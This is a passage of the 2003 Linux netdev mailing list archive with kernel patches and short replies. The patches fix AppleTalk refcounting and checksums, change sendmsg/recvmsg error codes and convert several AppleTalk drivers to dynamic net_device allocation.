In-Reply-To: <008201c343a3$0f9f8a70$2101a8c0@witbe> References: <3F03BC55.6050506@nortelnetworks.com> <008201c343a3$0f9f8a70$2101a8c0@witbe> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3870 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev The problem is that some protocol is still holding a reference to the device. This is a bug in the protocol, and needs to be fixed (ie not a ppp bug). Try building a kernel with only IPv4, eliminate all others then add back until you find the culprit. The following patch may help also. diff -Nru a/net/core/dev.c b/net/core/dev.c --- a/net/core/dev.c Wed Jul 9 11:40:56 2003 +++ b/net/core/dev.c Wed Jul 9 11:40:56 2003 @@ -72,6 +72,8 @@ * - netif_rx() feedback */ +#define DEBUG 1 + #include #include #include @@ -2704,6 +2706,8 @@ goto out; } +extern void dst_dumpref(const struct net_device *dev); + static void netdev_wait_allrefs(struct net_device *dev) { unsigned long rebroadcast_time, warning_time; @@ -2740,6 +2744,30 @@ current->state = TASK_RUNNING; if (time_after(jiffies, warning_time + 10 * HZ)) { +#ifdef DEBUG + dst_dumpref(dev); + + if (dev->atalk_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as AppleTalk device\n", dev->name); + if (dev->ip_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as IPv4 device\n", dev->name); + + if (dev->atalk_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as DECnet device\n", dev->name); + if (dev->ip6_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as IPv6 device\n", dev->name); + + if (dev->ec_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as Econet device\n", dev->name); + if (dev->ax25_ptr) + printk(KERN_INFO "unregister_netdevice: " + " %s: probably in use as AX.25 device\n", dev->name); +#endif printk(KERN_EMERG "unregister_netdevice: " "waiting for %s to become free. Usage " "count = %d\n", diff -Nru a/net/core/dst.c b/net/core/dst.c --- a/net/core/dst.c Wed Jul 9 11:40:56 2003 +++ b/net/core/dst.c Wed Jul 9 11:40:56 2003 @@ -41,6 +41,21 @@ static struct timer_list dst_gc_timer = TIMER_INITIALIZER(dst_run_gc, 0, DST_GC_MIN); + +void dst_dumpref(const struct net_device *dev) +{ + struct dst_entry *dst; + int count = 0; + + spin_lock_bh(&dst_lock); + for (dst = dst_garbage_list; dst; dst = dst->next) { + if (dst->dev == dev) ++count; + } + spin_unlock_bh(&dst_lock); + + printk(KERN_INFO "dst route cache has %d references\n", count); +} + static void dst_run_gc(unsigned long dummy) { int delayed = 0; From andrius@andrius.org Wed Jul 9 12:12:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 12:12:36 -0700 (PDT) Received: from hl.kalnieciai.lt (postfix@hl.kauneta.net [212.47.103.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69JCP2x006932 for ; Wed, 9 Jul 2003 12:12:28 -0700 Received: by hl.kalnieciai.lt (Postfix, from userid 1430) id 29CD94F228; Wed, 9 Jul 2003 22:12:23 +0300 (GMT-3) Received: from localhost (localhost [127.0.0.1]) by hl.kalnieciai.lt (Postfix) with ESMTP id 252354F226; Wed, 9 Jul 2003 22:12:23 +0300 (GMT-3) Date: Wed, 9 Jul 2003 22:12:23 +0300 (GMT-3) From: Andrius Kasparavicius X-X-Sender: andrius@hl.kauneta.net To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? In-Reply-To: <3F0C4DBD.8020007@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3871 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andrius@andrius.org Precedence: bulk X-list: netdev is there a clear list of which cards "works without patch", which "need patches/mtu changes" and which "never seen working"? Andrius On Wed, 9 Jul 2003, Ben Greear wrote: > Andrius Kasparavicius wrote: > > hello, as far as i know, currently there is no native vlan support in > > network device drivers. I mean, always need patching MTU.. add 4 bytes.. > > :-( > > > > is there any problems to include full vlans support? > > Intel's e100 driver (and all NICs supported by it) support vlans > fine, as do most of the GigE NICs. Tulip does not, last I hear, though > a work-around patch has been around forever. Realtek worked at one time, > not sure about now though... From tgr@reeler.org Wed Jul 9 12:36:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 12:36:50 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Jag2x000331 for ; Wed, 9 Jul 2003 12:36:45 -0700 Received: by reeler.org id 19aKjs-0003SC-00 ; Wed, 09 Jul 2003 21:36:28 +0200 Date: Wed, 9 Jul 2003 21:36:28 +0200 From: Thomas Graf To: davem@redhat.com Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: [PATCH] make {send|recv}msg return code 1003.1 compatible Message-ID: <20030709193628.GR2702@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3872 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello 1003.1 says: [EMSGSIZE] The msg_iovlen member of the msghdr structure pointed to by message is less than or equal to 0, or is greater than {IOV_MAX}. The patch changes the return code of {send|recv}msg from EINVAL to EMSGSIZE. -- thomas Index: net/socket.c =================================================================== RCS file: /cvs/tgr/linux-25/net/socket.c,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 socket.c --- net/socket.c 9 Jul 2003 18:42:29 -0000 1.1.1.1 +++ net/socket.c 9 Jul 2003 19:17:29 -0000 @@ -1614,7 +1614,7 @@ goto out; /* do not move before msg_sys is valid */ - err = -EINVAL; + err = -EMSGSIZE; if (msg_sys.msg_iovlen > UIO_MAXIOV) goto out_put; @@ -1713,7 +1713,7 @@ if (!sock) goto out; - err = -EINVAL; + err = -EMSGSIZE; if (msg_sys.msg_iovlen > UIO_MAXIOV) goto out_put; From shemminger@osdl.org Wed Jul 9 13:13:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:13:30 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KDH2x001106 for ; Wed, 9 Jul 2003 13:13:18 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KD0I25600; Wed, 9 Jul 2003 13:13:00 -0700 Date: Wed, 9 Jul 2003 13:13:00 -0700 From: Stephen Hemminger To: "David S. Miller" , Jay Schulist Cc: netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: [[RFT] convert appletalk over to new protocol Message-Id: <20030709131300.660c052f.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3873 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This fixes appletalk ddp protocol to address a couple of issues: - routing code was holding a reference to device without doing ref counting. - packet interface was old style - add shared buffer checks - add pullup's where needed - change checksum to handle fragmented sk_buff's - clean up comments to match above changes. I don't have real appletalk test infrastructure, and given the checksum change it should be tested against real Apple hardware. It does build, and loads/unloads fine. I can bring up the netatalk stuff without problem but have nothing to talk to it. diff -Nru a/net/appletalk/ddp.c b/net/appletalk/ddp.c --- a/net/appletalk/ddp.c Wed Jul 9 12:55:00 2003 +++ b/net/appletalk/ddp.c Wed Jul 9 12:55:00 2003 @@ -239,6 +239,7 @@ while ((tmp = *iface) != NULL) { if (tmp->dev == dev) { *iface = tmp->next; + dev_put(dev); kfree(tmp); dev->atalk_ptr = NULL; } else @@ -256,6 +257,7 @@ goto out; iface->dev = dev; + dev_hold(dev); dev->atalk_ptr = iface; iface->address = *sa; iface->status = 0; @@ -665,9 +667,13 @@ static int ddp_device_event(struct notifier_block *this, unsigned long event, void *ptr) { - if (event == NETDEV_DOWN) + switch (event) { + case NETDEV_DOWN: + case NETDEV_UNREGISTER: /* Discard any use of this */ atalk_dev_down(ptr); + break; + } return NOTIFY_DONE; } @@ -935,13 +941,10 @@ * Checksum: This is 'optional'. It's quite likely also a good * candidate for assembler hackery 8) */ -unsigned short atalk_checksum(struct ddpehdr *ddp, int len) -{ - unsigned long sum = 0; /* Assume unsigned long is >16 bits */ - unsigned char *data = (unsigned char *)ddp; - len -= 4; /* skip header 4 bytes */ - data += 4; +static unsigned long atalk_sum_partial(const unsigned char *data, + int len, unsigned long sum) +{ /* This ought to be unwrapped neatly. I'll trust gcc for now */ while (len--) { @@ -953,10 +956,94 @@ } data++; } + return sum; +} + +/* Checksum skb data -- similar to skb_checksum */ +static unsigned long atalk_sum_skb(const struct sk_buff *skb, int offset, + int len, unsigned long sum) +{ + int start = skb_headlen(skb); + int i, copy; + int pos = 0; + + /* checksum stuff in header space */ + if ( (copy = start - offset) > 0) { + if (copy > len) + copy = len; + sum = atalk_sum_partial(skb->data + offset, copy, sum); + if ( (len -= copy) == 0) + return sum; + offset += copy; + pos = copy; + } + + /* checksum stuff in frags */ + for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { + int end; + + BUG_TRAP(start <= offset + len); + + end = start + skb_shinfo(skb)->frags[i].size; + if ((copy = end - offset) > 0) { + u8 *vaddr; + skb_frag_t *frag = &skb_shinfo(skb)->frags[i]; + + if (copy > len) + copy = len; + vaddr = kmap_skb_frag(frag); + sum = atalk_sum_partial(vaddr + frag->page_offset + + offset - start, copy, sum); + kunmap_skb_frag(vaddr); + + if (!(len -= copy)) + return sum; + offset += copy; + pos += copy; + } + start = end; + } + + if (skb_shinfo(skb)->frag_list) { + struct sk_buff *list = skb_shinfo(skb)->frag_list; + + for (; list; list = list->next) { + int end; + + BUG_TRAP(start <= offset + len); + + end = start + list->len; + if ((copy = end - offset) > 0) { + if (copy > len) + copy = len; + sum = atalk_sum_skb(list, offset - start, + copy, sum); + if ((len -= copy) == 0) + return sum; + offset += copy; + pos += copy; + } + start = end; + } + } + + BUG_ON(len > 0); + + return sum; +} + +static unsigned short atalk_checksum(const struct sk_buff *skb, int len) +{ + unsigned long sum; + + /* skip header 4 bytes */ + sum = atalk_sum_skb(skb, 4, len-4, 0); + /* Use 0xFFFF for 0. 0 itself means none */ return sum ? htons((unsigned short)sum) : 0xFFFF; } + /* * Create a socket. Initialise the socket, blank the addresses * set the state. @@ -1335,25 +1422,26 @@ static int atalk_rcv(struct sk_buff *skb, struct net_device *dev, struct packet_type *pt) { - struct ddpehdr *ddp = ddp_hdr(skb); + struct ddpehdr *ddp; struct sock *sock; struct atalk_iface *atif; struct sockaddr_at tosat; int origlen; struct ddpebits ddphv; - /* Size check */ - if (skb->len < sizeof(*ddp)) + /* Don't mangle buffer if shared */ + if (!(skb = skb_share_check(skb, GFP_ATOMIC))) + goto out; + + /* Size check and make sure header is contiguous */ + if (!pskb_may_pull(skb, sizeof(*ddp))) goto freeit; + ddp = ddp_hdr(skb); /* * Fix up the length field [Ok this is horrible but otherwise * I end up with unions of bit fields and messy bit field order * compiler/endian dependencies..] - * - * FIXME: This is a write to a shared object. Granted it - * happens to be safe BUT.. (Its safe as user space will not - * run until we put it back) */ *((__u16 *)&ddphv) = ntohs(*((__u16 *)ddp)); @@ -1374,7 +1462,7 @@ * valid for net byte orders all over the networking code... */ if (ddp->deh_sum && - atalk_checksum(ddp, ddphv.deh_len) != ddp->deh_sum) + atalk_checksum(skb, ddphv.deh_len) != ddp->deh_sum) /* Not a valid AppleTalk frame - dustbin time */ goto freeit; @@ -1433,14 +1521,16 @@ if (!ap || skb->len < sizeof(struct ddpshdr)) goto freeit; + + /* Don't mangle buffer if shared */ + if (!(skb = skb_share_check(skb, GFP_ATOMIC))) + return 0; + /* * The push leaves us with a ddephdr not an shdr, and * handily the port bytes in the right place preset. */ - - skb_push(skb, sizeof(*ddp) - 4); - /* FIXME: use skb->cb to be able to use shared skbs */ - ddp = (struct ddpehdr *)skb->data; + ddp = (struct ddpehdr *) skb_push(skb, sizeof(*ddp) - 4); /* Now fill in the long header */ @@ -1583,6 +1673,7 @@ SOCK_DEBUG(sk, "SK %p: Copy user data (%d bytes).\n", sk, len); + /* TODO: copy and checksum in one pass */ err = memcpy_fromiovec(skb_put(skb, len), msg->msg_iov, len); if (err) { kfree_skb(skb); @@ -1592,7 +1683,7 @@ if (sk->sk_no_check == 1) ddp->deh_sum = 0; else - ddp->deh_sum = atalk_checksum(ddp, len + sizeof(*ddp)); + ddp->deh_sum = atalk_checksum(skb, len + sizeof(*ddp)); /* * Loopback broadcast packets to non gateway targets (ie routes @@ -1801,11 +1892,13 @@ struct packet_type ltalk_packet_type = { .type = __constant_htons(ETH_P_LOCALTALK), .func = ltalk_rcv, + .data = (void *) 1, }; struct packet_type ppptalk_packet_type = { .type = __constant_htons(ETH_P_PPPTALK), .func = atalk_rcv, + .data = (void *) 1, }; static unsigned char ddp_snap_id[] = { 0x08, 0x00, 0x07, 0x80, 0x9B }; From shemminger@osdl.org Wed Jul 9 13:13:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:13:49 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KDh2x001125 for ; Wed, 9 Jul 2003 13:13:44 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KDYI25700; Wed, 9 Jul 2003 13:13:34 -0700 Date: Wed, 9 Jul 2003 13:13:34 -0700 From: Stephen Hemminger To: Jeff Garzik , Jay Schulist Cc: netdev@oss.sgi.com, linux-atalk@lists.netspace.org Subject: [PATCH 2.5.74] convert appletalk/ipddp to dynamic allocation Message-Id: <20030709131334.79df4dca.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3874 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Part of the continuing campaign to fix all network devices to allocate dynamically. Built, loaded/unloaded and configured but don't have real test environment to communicate with other hosts. diff -Nru a/drivers/net/appletalk/ipddp.c b/drivers/net/appletalk/ipddp.c --- a/drivers/net/appletalk/ipddp.c Wed Jul 9 12:55:44 2003 +++ b/drivers/net/appletalk/ipddp.c Wed Jul 9 12:55:44 2003 @@ -72,17 +72,8 @@ printk("%s: Appletalk-IP Decap. mode by Jay Schulist \n", dev->name); - /* Fill in the device structure with ethernet-generic values. */ - ether_setup(dev); - /* Initalize the device structure. */ dev->hard_start_xmit = ipddp_xmit; - - dev->priv = kmalloc(sizeof(struct net_device_stats), GFP_KERNEL); - if(!dev->priv) - return -ENOMEM; - memset(dev->priv,0,sizeof(struct net_device_stats)); - dev->get_stats = ipddp_get_stats; dev->do_ioctl = ipddp_ioctl; @@ -281,7 +272,7 @@ } } -static struct net_device dev_ipddp; +static struct net_device *dev_ipddp; MODULE_LICENSE("GPL"); MODULE_PARM(ipddp_mode, "i"); @@ -290,29 +281,33 @@ { int err; - dev_ipddp.init = ipddp_init; - err=dev_alloc_name(&dev_ipddp, "ipddp%d"); - if(err < 0) - return err; + dev_ipddp = alloc_netdev(sizeof(struct net_device_stats), + "ipddp%d", ether_setup); - if(register_netdev(&dev_ipddp) != 0) - return -EIO; + if (!dev_ipddp) + return -ENOMEM; - return 0; + dev_ipddp->init = ipddp_init; + + if((err = register_netdev(dev_ipddp))) + kfree(dev_ipddp); + + return err; } static void __exit ipddp_cleanup_module(void) { struct ipddp_route *p; - unregister_netdev(&dev_ipddp); - kfree(dev_ipddp.priv); + unregister_netdev(dev_ipddp); while (ipddp_route_list) { p = ipddp_route_list->next; kfree(ipddp_route_list); ipddp_route_list = p; } + + kfree(dev_ipddp); } module_init(ipddp_init_module); From shemminger@osdl.org Wed Jul 9 13:24:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:24:54 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KOj2x001792 for ; Wed, 9 Jul 2003 13:24:46 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KOcI28241; Wed, 9 Jul 2003 13:24:38 -0700 Date: Wed, 9 Jul 2003 13:24:38 -0700 From: Stephen Hemminger To: Jeff Garzik , Jay Schulist Cc: netdev@oss.sgi.com Subject: [PATCH 2.5.74] convert appletalk/ltpc over to dynamic allocation Message-Id: <20030709132438.432fcd2b.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3875 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Part of the continuing campaign to fix all network devices to allocate dynamically. Built, loaded/unloaded and configured but don't have real hardware. --- linux-2.5.74/drivers/net/appletalk/ltpc.c 2003-07-09 13:19:55.000000000 -0700 +++ linux-2.5-sysfs/drivers/net/appletalk/ltpc.c 2003-07-09 13:22:14.000000000 -0700 @@ -884,18 +884,8 @@ /* Initialize the device structure. */ /* Fill in the fields of the device structure with ethernet-generic values. */ - ltalk_setup(dev); dev->hard_start_xmit = ltpc_xmit; dev->hard_header = ltpc_hard_header; - - dev->priv = kmalloc(sizeof(struct ltpc_private), GFP_KERNEL); - if(!dev->priv) - { - printk(KERN_INFO "%s: could not allocate statistics buffer\n", dev->name); - return -ENOMEM; - } - - memset(dev->priv, 0, sizeof(struct ltpc_private)); dev->get_stats = ltpc_get_stats; /* add the ltpc-specific things */ @@ -1169,6 +1159,7 @@ printk(KERN_INFO "Apple/Farallon LocalTalk-PC card at %03x, DMA%d. Using polled mode.\n",io,dma); /* seems more logical to do this *after* probing the card... */ + ltalk_setup(dev); err = ltpc_init(dev); if (err) return err; @@ -1256,11 +1247,10 @@ } __setup("ltpc=", ltpc_setup); -#endif /* MODULE */ -static struct net_device dev_ltpc; +#else /* MODULE */ -#ifdef MODULE +static struct net_device *dev_ltpc; MODULE_LICENSE("GPL"); MODULE_PARM(debug, "i"); @@ -1268,23 +1258,22 @@ MODULE_PARM(irq, "i"); MODULE_PARM(dma, "i"); - -int __init init_module(void) +static int __init ltpc_init_module(void) { - int err, result; + int result; if(io == 0) printk(KERN_NOTICE "ltpc: Autoprobing is not recommended for modules\n"); - /* Find a name for this unit */ - dev_ltpc.init = ltpc_probe; - err=dev_alloc_name(&dev_ltpc,"lt%d"); - - if(err<0) - return err; + dev_ltpc = alloc_netdev(sizeof(struct ltpc_private), "lt%d", + ltalk_setup); + - if ((result = register_netdev(&dev_ltpc)) != 0) { + dev_ltpc->init = ltpc_probe; + + if ((result = register_netdev(dev_ltpc)) != 0) { + kfree(dev_ltpc); printk(KERN_DEBUG "could not register Localtalk-PC device\n"); return result; } else { @@ -1292,7 +1281,6 @@ return 0; } } -#endif static void __exit ltpc_cleanup(void) { @@ -1302,9 +1290,9 @@ if(debug & DEBUG_VERBOSE) printk("freeing irq\n"); - if(dev_ltpc.irq) { - free_irq(dev_ltpc.irq,&dev_ltpc); - dev_ltpc.irq = 0; + if(dev_ltpc->irq) { + free_irq(dev_ltpc->irq,dev_ltpc); + dev_ltpc->irq = 0; } if(del_timer(<pc_timer)) @@ -1323,16 +1311,16 @@ if(debug & DEBUG_VERBOSE) printk("freeing dma\n"); - if(dev_ltpc.dma) { - free_dma(dev_ltpc.dma); - dev_ltpc.dma = 0; + if(dev_ltpc->dma) { + free_dma(dev_ltpc->dma); + dev_ltpc->dma = 0; } if(debug & DEBUG_VERBOSE) printk("freeing ioaddr\n"); - if(dev_ltpc.base_addr) { - release_region(dev_ltpc.base_addr,8); - dev_ltpc.base_addr = 0; + if(dev_ltpc->base_addr) { + release_region(dev_ltpc->base_addr,8); + dev_ltpc->base_addr = 0; } if(debug & DEBUG_VERBOSE) printk("free_pages\n"); @@ -1343,9 +1331,14 @@ if(debug & DEBUG_VERBOSE) printk("unregister_netdev\n"); - unregister_netdev(&dev_ltpc); + unregister_netdev(dev_ltpc); if(debug & DEBUG_VERBOSE) printk("returning from cleanup_module\n"); + + kfree(dev_ltpc); } +module_init(ltpc_init_module); module_exit(ltpc_cleanup); + +#endif From shemminger@osdl.org Wed Jul 9 13:29:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 13:29:23 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69KTH2x002112 for ; Wed, 9 Jul 2003 13:29:18 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69KTAI29092; Wed, 9 Jul 2003 13:29:10 -0700 Date: Wed, 9 Jul 2003 13:29:10 -0700 From: Stephen Hemminger To: Jeff Garzik , Jay Schulist Cc: netdev@oss.sgi.com Subject: [PATCH 2.5.74] Change appletalk/cops to dynamic allocation of net_device Message-Id: <20030709132910.589cf65d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3876 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Part of the continuing campaign to fix all network devices to allocate dynamically. Built and loaded/unloaded, but do not have the hardware. Surprisingly probe suceeds even without hardware. diff -Nru a/drivers/net/appletalk/cops.c b/drivers/net/appletalk/cops.c --- a/drivers/net/appletalk/cops.c Wed Jul 9 12:55:30 2003 +++ b/drivers/net/appletalk/cops.c Wed Jul 9 12:55:30 2003 @@ -235,9 +235,11 @@ * Dayna cards don't autoprobe well at all, but if your card is * at IRQ 5 & IO 0x240 we find it every time. ;) JS */ - for(i=0; cops_portlist[i]; i++) + for(i=0; cops_portlist[i]; i++) { + ltalk_setup(dev); if(cops_probe1(dev, cops_portlist[i]) == 0) return 0; + } return -ENODEV; } @@ -311,24 +313,12 @@ dev->base_addr = ioaddr; /* Initialize the private device structure. */ - dev->priv = kmalloc(sizeof(struct cops_local), GFP_KERNEL); - if(dev->priv == NULL) { - if (dev->irq) - free_irq(dev->irq, dev); - retval = -ENOMEM; - goto err_out; - } - lp = (struct cops_local *)dev->priv; - memset(lp, 0, sizeof(struct cops_local)); spin_lock_init(&lp->lock); /* Copy local board variable to lp struct. */ lp->board = board; - /* Fill in the fields of the device structure with LocalTalk values. */ - ltalk_setup(dev); - dev->hard_start_xmit = cops_send_packet; dev->tx_timeout = cops_timeout; dev->watchdog_timeo = HZ * 2; @@ -1012,44 +1002,50 @@ } #ifdef MODULE -static struct net_device cops0_dev = { .init = cops_probe }; +static struct net_device *cops0_dev; MODULE_LICENSE("GPL"); MODULE_PARM(io, "i"); MODULE_PARM(irq, "i"); MODULE_PARM(board_type, "i"); -int init_module(void) +static int __init cops_init_module(void) { - int result, err; + int err; if(io == 0) printk(KERN_WARNING "%s: You shouldn't autoprobe with insmod\n", cardname); - /* Copy the parameters from insmod into the device structure. */ - cops0_dev.base_addr = io; - cops0_dev.irq = irq; + cops0_dev = alloc_netdev(sizeof(struct cops_local), "lt%d", + ltalk_setup); + + cops0_dev->init = cops_probe; - err=dev_alloc_name(&cops0_dev, "lt%d"); - if(err < 0) - return err; + /* Copy the parameters from insmod into the device structure. */ + cops0_dev->base_addr = io; + cops0_dev->irq = irq; - if((result = register_netdev(&cops0_dev)) != 0) - return result; + if ((err = register_netdev(cops0_dev))) + kfree(cops0_dev); - return 0; + return err; } -void cleanup_module(void) +static void __exit cops_cleanup_module(void) { - unregister_netdev(&cops0_dev); - kfree(cops0_dev.priv); - if(cops0_dev.irq) - free_irq(cops0_dev.irq, &cops0_dev); - release_region(cops0_dev.base_addr, COPS_IO_EXTENT); + unregister_netdev(cops0_dev); + + if(cops0_dev->irq) + free_irq(cops0_dev->irq, &cops0_dev); + release_region(cops0_dev->base_addr, COPS_IO_EXTENT); + kfree(cops0_dev); } -#endif /* MODULE */ + +module_init(cops_init_module); +module_exit(cops_cleanup_module); + +#endif /* * Local variables: From shemminger@osdl.org Wed Jul 9 14:45:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 14:45:40 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Lja2x003448 for ; Wed, 9 Jul 2003 14:45:36 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69LjTI12035; Wed, 9 Jul 2003 14:45:29 -0700 Date: Wed, 9 Jul 2003 14:45:29 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: [PATCH] Convert hp100 to useing alloc_etherdev Message-Id: <20030709144529.5c14d995.shemminger@osdl.org> In-Reply-To: <20030708151427.328aae38.shemminger@osdl.org> References: <20030708151427.328aae38.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3877 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This patch won't work for the non-module probe case, will resubmit a better one. From shemminger@osdl.org Wed Jul 9 14:46:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 14:46:22 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69LkE2x003531 for ; Wed, 9 Jul 2003 14:46:14 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69Lk5I12225; Wed, 9 Jul 2003 14:46:05 -0700 Date: Wed, 9 Jul 2003 14:46:05 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: Re: [PATCH 2.5.74] convert apne to dynamic allocation Message-Id: <20030709144605.48f3d4dc.shemminger@osdl.org> In-Reply-To: <20030708151245.179cac2b.shemminger@osdl.org> References: <20030708151245.179cac2b.shemminger@osdl.org> Organization: Open Source Development Lab 